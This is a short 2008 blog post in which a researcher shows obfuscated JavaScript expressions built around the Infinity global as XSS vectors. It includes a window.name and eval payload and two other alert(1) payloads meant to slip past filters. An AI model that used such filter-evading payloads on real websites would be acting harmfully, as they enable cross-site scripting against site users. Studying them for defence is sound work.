To infinity and beyond!
Wednesday, 1 October 2008
I’m still heavily researching Javascript in search of XSS vectors and interesting syntax. I’ve found loads of cool stuff recently and while looking through the ECMA spec. I came across the Infinity object which is a global and a number, of course I was already aware of it but I thought what kind of interesting code can be constructed with it.
It turns out quite a lot, here’s a window.name vector. I’ve added the variable name to simulate and execute the code.
name = 'alert(1)'
-Infinity++in eval(1&&name)
This doesn’t look like it could work but does
+Infinity++in+alert(1)
And my final example combines a few different operators:-
1,0000instanceof delete~void--Infinity/~alert(1)
There are endless possiblities and I’ll leave you to play